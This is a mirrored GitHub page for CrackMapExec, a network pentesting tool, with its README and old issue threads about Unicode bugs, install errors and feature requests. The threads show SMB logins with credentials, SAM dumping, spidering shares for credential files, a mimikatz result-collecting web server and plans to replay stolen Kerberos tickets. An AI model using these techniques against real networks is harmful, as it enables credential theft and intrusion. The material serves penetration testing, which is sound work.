Giter Site home page Giter Site logo

byt3bl33d3r / crackmapexec Goto Github PK

View Code? Open in Web Editor NEW
8.1K 306.0 1.6K 10.08 MB

A swiss army knife for pentesting networks

License: BSD 2-Clause "Simplified" License

Python 99.48% Dockerfile 0.02% Makefile 0.02% Nix 0.04% PowerShell 0.27% VBScript 0.18%
python active-directory pentesting windows powershell networks

crackmapexec's Introduction

No Longer Maintained

This project is no longer mantained due to the existence of a hostile fork.

CrackMapExec

cme

You are on the latest up-to-date repository of the project CrackMapExec ! 🎉

  • 🚧 If you want to report a problem, open un Issue
  • 🔀 If you want to contribute, open a Pull Request
  • 💬 If you want to discuss, open a Discussion

Acknowledgments

(These are the people who did the hard stuff)

This project was originally inspired by:

Unintentional contributors:

  • The Empire project
  • @T-S-A's smbspider script
  • @ConsciousHacker's partial Python port of Invoke-obfuscation from the GreatSCT project

Documentation, Tutorials, Examples

See the project's wiki for documentation and usage examples

Installation

Please see the installation instructions on the official wiki

Code Contributors

Awesome code contributors of CME:

To do

  • 0wn everything

crackmapexec's People

Contributors

aj-cgtech avatar bongobongoland avatar byt3bl33d3r avatar chocapicyo avatar cyb3rc3lt avatar d3lb3 avatar daahtking avatar dfte avatar dliv3 avatar hackndo avatar ilightthings avatar juliourena avatar kahvi-0 avatar lesydimitri avatar marshall-hallenbeck avatar mpgn avatar neffisback avatar noraj avatar nurfed1 avatar pgormands avatar probird5 avatar qtc-de avatar r4wd3r avatar serizao avatar shad0wc0ntr0ller avatar snovvcrash avatar spyr0-sec avatar termanix avatar xiaolichan avatar zblurx avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

dipsec jbarcia javing77 johnjohnsp1 stglolry saji89 guardianrg rkornmeyer zigitax gabtremblay rnmx lucabongiorni lodoss arschlochnop pekita1 thezakman coca1ne evilrovot gonsalu infosecgeek paran0ids0ul team-firebugs cyberscions pyq881120 masbog johnrebull securityigi theguildhall gmlanzi motazreda loveshell codecrack3 jwhitney83 barnett-labs icekvot carnal0wnage jakuta-tech nebooben zined lu-chi danmcinerney caoimhinp laurentfough 0x0mar kostyll 00derp vaginessa velocitystorm jamalmo maaaaz phpplay eniac888 aisling-kells jacobjacob twi252 az0ne noscripter vysecurity security-geeks inscriptionweb m4rm0k fist0urs super-ala coffeehb binarygu majl bruceleo1969 zhangran tylerdurden2010 v4n1sh bird0ntheway lnln1111 leoliuzcl huakaii tduncle caineqt lucas1111 samueltt hello-earth bupt007 git20150901 q-jone nobitagamer diegslva ttxx9999 sho-luv void-in tarzand brianwrf xunnun famous0123 scuhurricane alli1n key20 checkyourscreen quikilr 3l3n4 yep0 aefdr v0re

crackmapexec's Issues

Improve results presentation for lusers and sessions modules

Hello @byt3bl33d3r,

It could be a nice thing to better output results for the --lusers and --sessions modules as it is not tabbed:
`print "{} {}".format(fname, yellow(luser[fname]))``
which gives that:

[+] 192.168.11.136:445 DC01 Logged on users:
wkui1_logon_domain ADYOLO
wkui1_oth_domains
wkui1_username Administrator
wkui1_logon_server DC01
wkui1_logon_domain ADYOLO
wkui1_oth_domains
wkui1_username DC01$
wkui1_logon_server
wkui1_logon_domain ADYOLO
wkui1_oth_domains
wkui1_username DC01$
wkui1_logon_server
wkui1_logon_domain ADYOLO
wkui1_oth_domains
wkui1_username DC01$
wkui1_logon_server

Something like the share presentation, with fixed-size format could be great:
print_att('{:>15} {:>15}'.format('SHARE', 'Permissions'))

Cheers.

UnicodeDecodeError: 'ascii' codec can't decode byte

I really like this tool, but I'm having some problems with encoding.

I'm trying to run it against a host with words like "Administração", "Usuário" so on.

root@host:~/tools/CrackMapExec# git pull
Already up-to-date.

root@host:~/tools/CrackMapExec# ./crackmapexec.py -t 20 -u **USER** -p **PASS** **HOST** --sam
[*] **HOST**:445 is running Windows 5.1 (name:**NAME**) (domain:**DOMAIN**)
[+] **HOST**:445 Login successful **CREDS**
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "./crackmapexec.py", line 3072, in connect
    sam_dump.dump(smb)
  File "./crackmapexec.py", line 1709, in dump
    bootKey = self.__remoteOps.getBootKey()
  File "./crackmapexec.py", line 933, in getBootKey
    self.__bootKey += bootKey[transforms[i]]
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 in position 0: ordinal not in range(128)
<Greenlet at 0xa356cac: connect('**HOST**')> failed with UnicodeDecodeError

root@host:~/tools/CrackMapExec#

Won't launch

Error Code:
/CrackMapExec-master/crackmapexec.py -h
Traceback (most recent call last):
File "/root/Desktop/Link to opt/CrackMapExec-master/crackmapexec.py", line 16, in
from impacket.dcerpc.v5 import transport, scmr, samr, drsuapi, rrp, tsch, srvs, wkst, epm
ImportError: cannot import name drsuapi

Same error !

root@backbox:/home/its_0x08/Desktop/exploits/CrackMapExec# python crackmapexec.py -t 100 192.168.192.0-255
[] 192.168.192.55:445 is running Windows 6.1 Build 7601 (name:ISLAM-EL) (domain:ISLAM-EL)
[] 192.168.192.11:445 is running Windows 10.0 Build 10240 (name:WIN-9FJM713M56L) (domain:WIN-9FJM713M56L)
[] 192.168.192.102:445 is running Windows 6.1 Build 7601 (name:ADMIN-PC) (domain:ADMIN-PC)
[] 192.168.192.60:445 is running Windows 6.1 Build 7601 (name:ADEL-PC) (domain:ADEL-PC)
[] 192.168.192.104:445 is running Windows 6.3 Build 9600 (name:ASUS) (domain:ASUS)
[] 192.168.192.97:445 is running Windows 6.1 Build 7600 (name:MAC-MINI-ALEKSEJ) (domain:MACMINI-EB09D7)
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
result = self._run(_self.args, _self.kwargs)
File "crackmapexec.py", line 2884, in connect
print_status("{}:{} is running {} (name:{}) (domain:{})".format(host, args.port, smb.getServerOS(), s_name, domain))
File "crackmapexec.py", line 75, in print_status
cprint("[] ", 'blue', attrs=['bold'], end=message.encode('utf-8')+'\n')
UnicodeDecodeError: 'ascii' codec can't decode byte 0xd0 in position 63: ordinal not in range(128)
<Greenlet at 0xb64f97acL: connect('192.168.192.51')> failed with UnicodeDecodeError

[_] 192.168.192.186:445 is running Windows 6.3 Build 9600 (name:ISIDORO) (domain:ISIDORO)
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
result = self._run(_self.args, *self.kwargs)
File "crackmapexec.py", line 2884, in connect
print_status("{}:{} is running {} (name:{}) (domain:{})".format(host, args.port, smb.getServerOS(), s_name, domain))
File "crackmapexec.py", line 75, in print_status
cprint("[] ", 'blue', attrs=['bold'], end=message.encode('utf-8')+'\n')
UnicodeDecodeError: 'ascii' codec can't decode byte 0xd0 in position 67: ordinal not in range(128)
<Greenlet at 0xb5241a2cL: connect('192.168.192.143')> failed with UnicodeDecodeError

[] 192.168.192.155:445 is running Windows 6.1 Build 7601 (name:ACER-PC) (domain:ACER-PC)
[] 192.168.192.213:445 is running Windows 6.1 Build 7601 (name:ADMIN-TOSH) (domain:ADMIN-TOSH)
[] 192.168.192.247:445 is running Windows 6.1 Build 7601 (name:LORRAINE) (domain:LORRAINE)
[] 192.168.192.166:445 is running Windows 6.3 Build 9600 (name:ILHOM) (domain:ILHOM)
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
result = self._run(_self.args, _self.kwargs)
File "crackmapexec.py", line 2884, in connect
print_status("{}:{} is running {} (name:{}) (domain:{})".format(host, args.port, smb.getServerOS(), s_name, domain))
File "crackmapexec.py", line 75, in print_status
cprint("[] ", 'blue', attrs=['bold'], end=message.encode('utf-8')+'\n')
UnicodeDecodeError: 'ascii' codec can't decode byte 0xd0 in position 62: ordinal not in range(128)
<Greenlet at 0xb525470cL: connect('192.168.192.183')> failed with UnicodeDecodeError

[] 192.168.192.230:445 is running Windows 6.1 Build 7601 (name:ASUS) (domain:ASUS)
^CKeyboardInterrupt
[] Got CTRL-C! Exiting..
root@backbox:/home/its_0x08/Desktop/exploits/CrackMapExec#

an other error 

[+] 192.168.192.224:445 Login successful LENOVO\admin:admin
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 3034, in connect
    share_list = enum_shares(smb)
  File "crackmapexec.py", line 2811, in enum_shares
    if smb.listPath(share_name, '*', args.passwd):
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 344, in listPath
    return self._SMBConnection.list_path(shareName, path, password)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 1392, in listPath
    self.close(treeId, fileId)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 974, in close
    ans = self.recvSMB(packetID)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 376, in recvSMB
    packet = SMB2Packet(data.get_trailer())
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb3structs.py", line 434, in __init__
    Structure.__init__(self,data)
  File "/usr/local/lib/python2.7/dist-packages/impacket/structure.py", line 82, in __init__
    self.fromString(data)
  File "/usr/local/lib/python2.7/dist-packages/impacket/structure.py", line 147, in fromString
    self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0])
  File "/usr/local/lib/python2.7/dist-packages/impacket/structure.py", line 291, in unpack
    raise Exception, "Unpacked data doesn't match constant value '%r' should be '%r'" % (data, answer)
Exception: ("Unpacked data doesn't match constant value '''' should be ''\\xfeSMB''", 'When unpacking field \'ProtocolID | "\xfeSMB | \'\'[:4]\'')
<Greenlet at 0xb52b920cL: connect('192.168.192.224')> failed with Exception

Unconsistent results presentation for spidering

Hello @byt3bl33d3r ,

There is a weird result presentation for the spidering module.
In the following example I have a credz.txt file in the encoding2 folder but it is displayed as //192.168.11.133/encoding2\*/credz.txt: why is there the * char before ?
I guess it is related to pattern matching.

$ python crackmapexec.py -d adyolo -u user1 -p "yoloswag1!" 192.168.11.133 -s share --spider encoding2 --content --pattern cred

[*] 192.168.11.133:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:adyolo)
[+] 192.168.11.133:445 Login successful adyolo\user1:yoloswag1!
[*] 192.168.11.133:445 DC01 Started spidering
//192.168.11.133/encoding2\*/credz.txt [lastm:'2015-11-01 22:32' size:25]
[*] 192.168.11.133:445 DC01 Done spidering (Completed in 0.0818431377411)

Add a port option for the HTTP Webserver serving ps scripts

Hello @byt3bl33d3r,

It would also be cool to give users the possibility to set the listening port of the Webserver to a specific value as:

  • The user might not be privileged to listen on 443 and 80 port
  • Specific egress flows might be allowed on custom ports :)
        if args.ssl:
            httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), MimikatzServer)
            httpd.socket = ssl.wrap_socket(httpd.socket, certfile='certs/crackmapexec.crt', keyfile='certs/crackmapexec.key', server_side=True)
        else:
            httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)

Something like --http-port [port] could be cool!

Cheers.

SMBConnection

Traceback (most recent call last):
File "crackmapexec.py", line 11, in
from core.maingreenlet import connect
File "/home/its_0x08/Desktop/exploits/CrackMapExec/core/maingreenlet.py", line 4, in
from impacket.smbconnection import SMBConnection, SessionError
ImportError: cannot import name SessionError

UnicodeEncodeError when using unicode chars in supplied credentials

[-] 192.168.200.44:445 ISIDORO\guest:admin SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
result = self._run(_self.args, *_self.kwargs)
File "crackmapexec.py", line 2935, in connect
smb = smart_login(host, smb, domain)
File "crackmapexec.py", line 2713, in smart_login
smb.login(user, passwd, domain)
File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 210, in login
return self._SMBConnection.login(user, password, domain, lmhash, nthash)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 678, in login
blob['MechToken'] = str(auth)
File "/usr/local/lib/python2.7/dist-packages/impacket/structure.py", line 170, in str
return self.getData()
File "/usr/local/lib/python2.7/dist-packages/impacket/ntlm.py", line 211, in getData
return Structure.getData(self)
File "/usr/local/lib/python2.7/dist-packages/impacket/structure.py", line 121, in getData
data += self.packField(field[0], field[1])
File "/usr/local/lib/python2.7/dist-packages/impacket/structure.py", line 106, in packField
ans = self.pack(format, self.fields[fieldName], field = fieldName)
File "/usr/local/lib/python2.7/dist-packages/impacket/structure.py", line 263, in pack
return str(data)
UnicodeEncodeError: 'ascii' codec can't encode characters in position 0-8: ordinal not in range(128)
<Greenlet at 0xb6552b1cL: connect('192.168.200.10')> failed with UnicodeEncodeError

[-] 192.168.200.68:445 LS--20150801JUS\admin:admin SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

Add a recursive listing option

Hello @byt3bl33d3r,

It could be cool to allow recursive listing of shares.
I might be wrong but it is currently not possible with crackmapexec.

Functionally speaking, I'm thinking about the same stuff such as the auxiliary/scanner/smb/smb_enumshares msf module, with the ability to produce CSV files etc.:

Module options (auxiliary/scanner/smb/smb_enumshares):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   LogSpider        3                no        0 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt) (Accepted: 0, 1, 2, 3)
   MaxDepth         999              yes       Max number of subdirectories to spider
   RHOSTS           192.168.11.136   yes       The target address range or CIDR identifier
   SMBDomain        adyolo           no        The Windows domain to use for authentication
   SMBPass          yoloswag1!       no        The password for the specified username
   SMBUser          user1            no        The username to authenticate as
   ShowFiles        true             yes       Show detailed information when spidering
   SpiderProfiles   true             no        Spider only user profiles when share = C$
   SpiderShares     true             no        Spider shares recursively
   THREADS          1                yes       The number of concurrent threads
   USE_SRVSVC_ONLY  false            yes       List shares only with SRVSVC

msf auxiliary(smb_enumshares) > run

[-] 192.168.11.136:139 - Login Failed: The SMB server did not reply to our request
[*] 192.168.11.136:445 - Windows 2012 R2  (Unknown)
[+] 192.168.11.136:445 - ADMIN$ - (DS) Remote Admin
[+] 192.168.11.136:445 - C$ - (DS) Default share
[+] 192.168.11.136:445 - IPC$ - (I) Remote IPC
[+] 192.168.11.136:445 - NETLOGON - (DS) Logon server share 
[+] 192.168.11.136:445 - share - (DS) 
[+] 192.168.11.136:445 - SYSVOL - (DS) Logon server share 
[+] 192.168.11.136:445 \\ADYOLO\share
=================================

 Type  Name                Created              Accessed             Written              Changed              Size
 ----  ----                -------              --------             -------              -------              ----
 ARC   blns.txt            11-01-2015 12:06:38  11-01-2015 12:06:38  10-30-2015 22:40:36  10-30-2015 22:40:36  24576
 ARC   create_files.py     11-01-2015 12:03:36  11-01-2015 12:03:36  11-01-2015 12:50:09  11-01-2015 12:50:09  4096
 ARC   credz.txt           11-01-2015 13:22:04  11-01-2015 13:22:04  11-01-2015 13:19:04  11-01-2015 22:32:27  32
 ARC   french_accents.txt  11-01-2015 12:43:05  11-01-2015 12:43:05  11-01-2015 12:45:14  11-01-2015 12:45:14  392
 DIR   encoding2           11-01-2015 12:56:50  11-01-2015 22:50:16  11-01-2015 22:50:16  11-01-2015 22:50:16  0
 DIR   encoding            11-01-2015 12:03:19  11-01-2015 23:03:11  11-01-2015 23:03:11  11-01-2015 23:03:11  0

[+] 192.168.11.136:445 \\ADYOLO\share\encoding
==========================================

 Type  Name                                    Created              Accessed             Written              Changed              Size
 ----  ----                                    -------              --------             -------              -------              ----
 ARC   614_Thk brown fox... [Beeeep].test....  11-01-2015 12:25:28  11-01-2015 12:25:28  11-01-2015 12:25:28  11-01-2015 12:25:30  0
 ARC   567_ZZ                                  11-01-2015 12:35:43  11-01-2015 12:35:43  11-01-2015 12:35:43  11-01-2015 12:35:43  0
 ARC   566_A                                   11-01-2015 12:35:43  11-01-2015 12:35:43  11-01-2015 12:35:43  11-01-2015 12:35:43  0
 ARC   279_' autofocus onkeyup='javascript     11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  0
 ARC   274_src=JaVaSCript                      11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  0
 ARC   272_JavaSCript                          11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  0
 ARC   264_onfocus=JaVaSCript                  11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  0
 ARC   266_' onfocus=JaVaSCript                11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  11-01-2015 12:35:41  0
 DIR   22_.test                                11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  0
 DIR   18_.test                                11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  0
 DIR   17_                                     11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  0
 DIR   16_                                     11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  0
 DIR   15_None.test                            11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  0
 DIR   14_False.test                           11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  11-01-2015 12:24:59  0
...

Cheers.

Rewrite the mimikatz result parsing section

Hello @byt3bl33d3r,

Currently, your mimikatz results parsing with --mimikatz option could generate an exception.

  1. Send a raw HTTP POST request with the following body `
Password: toto
Domain: toto
User: titi
  1. Your buf variable is equal to ['Password: totoDomain: totoUser: titi'] so only 1 item
  2. See the following bug related to non existent index in the bug variable
192.168.11.136 - - [08/Nov/2015 19:01:07] "POST /toto HTTP/1.1" 200 -
----------------------------------------
Exception happened during processing of request from ('192.168.11.136', 56129)
Traceback (most recent call last):
  File "C:\Python27\lib\SocketServer.py", line 295, in _handle_request_noblock
    self.process_request(request, client_address)
  File "C:\Python27\lib\SocketServer.py", line 321, in process_request
    self.finish_request(request, client_address)
  File "C:\Python27\lib\SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "C:\Python27\lib\SocketServer.py", line 655, in __init__
    self.handle()
  File "C:\Python27\lib\BaseHTTPServer.py", line 340, in handle
    self.handle_one_request()
  File "C:\Python27\lib\BaseHTTPServer.py", line 328, in handle_one_request
    method()
  File "crackmapexecwin.py", line 266, in do_POST
    user   = buf[i-2].split(':')[1].strip()
IndexError: list index out of range

Relying on receiving a good CRLF formatted input is not really reliable.
More over you could even try to parse the result before writing anything (for instance with that implementation) because as the attacker has a listening web server on for that feature, he could be attacked by automated scanner that would fill its disk with wrong/polluted data :)

Improve output

Hello @byt3bl33d3r,

For the results presentation, could you insert a empty line between hosts in order to make it clearer ?

Cheers.

Add file content searching support

Hello again,

It would also be cool to have a native file search command in CrackMapExec, going further than just listing dirs (which is already cool btw).
You could be inspired by the Invoke-FileFinder function from PowerView module :)

Cheers.

Username and password unicode support

@byt3bl33d3r,

I faced some unicode errors regarding user names.
In the following example, I do have an user named 'Invité' (french for 'guest').

(venvcrackmapexec)root@kali:~/Partage/CrackMapExec# python -i crackmapexec.py -t 2 192.168.11.129 -u admin -p admin --shares --users
[*] 192.168.11.129:445 is running Windows 6.1 Build 7601 (name:WIN-P3B5MV8U1LT) (domain:WIN-P3B5MV8U1LT)
[+] 192.168.11.129:445 Login successful 'WIN-P3B5MV8U1LT\admin:admin'
[+] 192.168.11.129:445 WIN-P3B5MV8U1LT Dumping users (rid:user):
1000: Admin
500: Administrateur
Traceback (most recent call last):
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 2872, in connect
    print_att('{}: {}'.format(user[1], user[0]))
UnicodeEncodeError: 'ascii' codec can't encode character u'\xe9' in position 5: ordinal not in range(128)
<Greenlet at 0xb6754b6cL: connect('192.168.11.129')> failed with UnicodeEncodeError

I have been able to fix it by changing the following code section (line 2872):
from

for user in users:
                    print_att('{}: {}'.format(user[1], user[0]))

to

for user in users:
                    print_att(u'{}: {}'.format(user[1], user[0]))

I guess that this lack of unicode support is not limited to this module (dumping usernames). Maybe you could try to find a way to include that support in your lamba print_* functions.

Cheers

Error

[_] 192.168.192.101:445 is running Windows 6.3 Build 9600 (name:JABAR) (domain:JABAR)
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
result = self._run(_self.args, **self.kwargs)
File "crackmapexec.py", line 2929, in connect
smb.logoff()
File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 293, in logoff
return self._SMBConnection.logoff()
File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 1234, in logoff
ans = self.recvSMB(packetID)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb3.py", line 356, in recvSMB
data = self._NetBIOSSession.recv_packet(self._timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 918, in non_polling_read
raise NetBIOSTimeout
NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
<Greenlet at 0xb528c52cL: connect('192.168.192.134')> failed with NetBIOSTimeout

^CKeyboardInterrupt
[*] Got CTRL-C! Exiting..
root@backbox:/home/its_0x08/Desktop/exploits/CrackMapExec#

Multiple actions asked, global fail at first fail

Hello @byt3bl33d3r,

I'm reporting a bug related to multiple actions execution. Indeed if you specify multiple actions comprising at least one not authorized, the whole execution will fail and you won't even see the authorized one.

In this example the user :

  • ... can enumerate shares:
(venvcrackmapexec)root@kali:~/Partage/CrackMapExec_fork# python crackmapexec.py 192.168.11.136 -u user1 -p yoloswag1! --shares 
11-29-2015 14:15:41 [*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:ADYOLO)
11-29-2015 14:15:41 [+] 192.168.11.136:445 Login successful ADYOLO\user1:yoloswag1!
11-29-2015 14:15:41 [+] 192.168.11.136:445 Available shares:
11-29-2015 14:15:41           SHARE     Permissions
11-29-2015 14:15:41           -----     -----------
11-29-2015 14:15:41          ADMIN$       NO ACCESS
11-29-2015 14:15:41            IPC$            READ
11-29-2015 14:15:41           share     READ, WRITE
11-29-2015 14:15:41          SYSVOL            READ
11-29-2015 14:15:41              C$       NO ACCESS
11-29-2015 14:15:41        NETLOGON            READ
  • ...but cannot list the content of one:
(venvcrackmapexec)root@kali:~/Partage/CrackMapExec_fork# python crackmapexec.py 192.168.11.136 -u user1 -p yoloswag1! --list share
11-29-2015 14:20:26 [*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:ADYOLO)
11-29-2015 14:20:26 [+] 192.168.11.136:445 Login successful ADYOLO\user1:yoloswag1!
11-29-2015 14:20:26 [-] 192.168.11.136:445 SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

Now, if I ask for both actions in the same command line, both will fail as I won't see the authorized one:

(venvcrackmapexec)root@kali:~/Partage/CrackMapExec_fork# python crackmapexec.py 192.168.11.136 -u user1 -p yoloswag1! --shares --list share
11-29-2015 14:21:54 [*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:ADYOLO)
11-29-2015 14:21:54 [+] 192.168.11.136:445 Login successful ADYOLO\user1:yoloswag1!
11-29-2015 14:21:54 [-] 192.168.11.136:445 SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

Cheers

Install problem

I ran pip install --upgrade -r requirements.txt on Kali2
it seemed to complete successfully but when I run:
python crackmapexec.py
I get error:
Traceback (most recent call last):
File "crackmapexec.py", line 16, in
from impacket.dcerpc.v5 import transport, scmr, samr, drsuapi, rrp, tsch, srvs, wkst, epm
ImportError: cannot import name drsuapi

When I try and install drsuapi
I'm told:
Requirement already satisfied (use --upgrade to upgrade): impacket in /usr/lib/python2.7/dist-packages

Default thread number

Hello @byt3bl33d3r,

I think that it would be cool if a default thread number was set, to avoid the frustration of forgetting the -t option :)

Kerberos ticket loading support on Windows

Hello @byt3bl33d3r,

As I'm going through the new features you added and how could they be used from Windows hosts, I would like to know if you wanted to add a Windows support for the kerberos ticket loading (--kerb and -k).
The thing is you actually rely on impacket's implementation which loads $KRB5CCNAME env variable to find tickets, which is obviously related to the Unix world.

So my point is to allow a user who whould have grabbed tickets with mimikatz to be able to replay them through crackmapexecwin. That link gives the modus operandi:

  • The attacker should first convert it with kirbikator
  • The attacker should then use a Unix/linux client to load it: this is the step I want to avoid as I'd like to load it from Windows.

By quickly looking at impacket code, it could be possible to achieve this by calling CCache.loadFile() with a custom Windows path (user specified).
What do you think about ?

I'm aware that this might rather be an impacket issue, so I'll also post it on their github section

Cheers.

Still some encoding issues

Hello @byt3bl33d3r,

I would like to report (again) some encoding issues.
Steps to reproduce:

  1. Create a file named àâæçéèêëïîôœ—– »« ”’€ÿüûù.txt on a share. Note that this contains french accents.
  2. List that share
  3. See the bug
$ python crackmapexec.py -d adyolo -u user1 -p "yoloswag1!" 192.168.11.136 -s share --list encoding2
[*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:adyolo)
[+] 192.168.11.136:445 Login successful adyolo\user1:yoloswag1!
[+] 192.168.11.136:445 Contents of encoding2\*:
drw-rw-rw-       0 2015-11-01 22:50 .
drw-rw-rw-       0 2015-11-01 22:50 ..
-rw-rw-rw-      25 2015-11-01 22:32 credz.txt
Traceback (most recent call last):
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 2903, in connect
    f.get_longname()))
UnicodeEncodeError: 'ascii' codec can't encode characters in position 0-13: ordinal not in range(128)
<Greenlet at 0xb679bbbcL: connect('192.168.11.136')> failed with UnicodeEncodeError

I managed to fix this by editing the line #2093
from:

f.get_longname()

to:

f.get_longname().encode('utf-8')

It gives that output:

python crackmapexec_bug.py -d adyolo -u user1 -p "yoloswag1!" 192.168.11.136 -s share --list encoding2
[*] 192.168.11.136:445 is running Windows 6.3 Build 9600 (name:DC01) (domain:adyolo)
[+] 192.168.11.136:445 Login successful adyolo\user1:yoloswag1!
[+] 192.168.11.136:445 Contents of encoding2\*:
drw-rw-rw-       0 2015-11-01 22:50 .
drw-rw-rw-       0 2015-11-01 22:50 ..
-rw-rw-rw-      25 2015-11-01 22:32 credz.txt
-rw-rw-rw-      33 2015-11-01 13:14 àâæçéèêëïîôœ—– »« ”’€ÿüûù.txt

I saw you modified the print_* functions but I don't understand why utf-8 decoding fails at this point.

Finally, note that these encoding issues might exists for other features, every feature calling the longname() function.

Cheers.

impacket installation errors

Great work on a great tool! On my fresh Kali 2.0 install I get the following when trying to run
"pip install -r requirements.txt"

I have attempted to install in a venv and normally.

Downloading/unpacking git+git://github.com/CoreSecurity/impacket (from -r requirements.txt (line 1))
  Cloning git://github.com/CoreSecurity/impacket to /tmp/pip-bxbV3L-build
fatal: unable to connect to github.com:
github.com[0: 192.30.252.130]: errno=Connection timed out

  Complete output from command /usr/bin/git clone -q git://github.com/CoreSecurity/impacket /tmp/pip-bxbV3L-build:

----------------------------------------
Cleaning up...
Command /usr/bin/git clone -q git://github.com/CoreSecurity/impacket /tmp/pip-bxbV3L-build failed with error code 128 in None
Storing debug log for failure in /root/.pip/pip.log

**From pip.log:**

Cloning git://github.com/CoreSecurity/impacket to /tmp/pip-bxbV3L-build
  Found command 'git' at '/usr/bin/git'
  Running command /usr/bin/git clone -q git://github.com/CoreSecurity/impacket /tmp/pip-bxbV3L-build
  Complete output from command /usr/bin/git clone -q git://github.com/CoreSecurity/impacket /tmp/pip-bxbV3L-build:

----------------------------------------
Cleaning up...
Command /usr/bin/git clone -q git://github.com/CoreSecurity/impacket /tmp/pip-bxbV3L-build failed with error code 128 in None
Exception information:
Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/pip/basecommand.py", line 122, in main
    status = self.run(options, args)
  File "/usr/lib/python2.7/dist-packages/pip/commands/install.py", line 290, in run
    requirement_set.prepare_files(finder, force_root_egg_info=self.bundle, bundle=self.bundle)
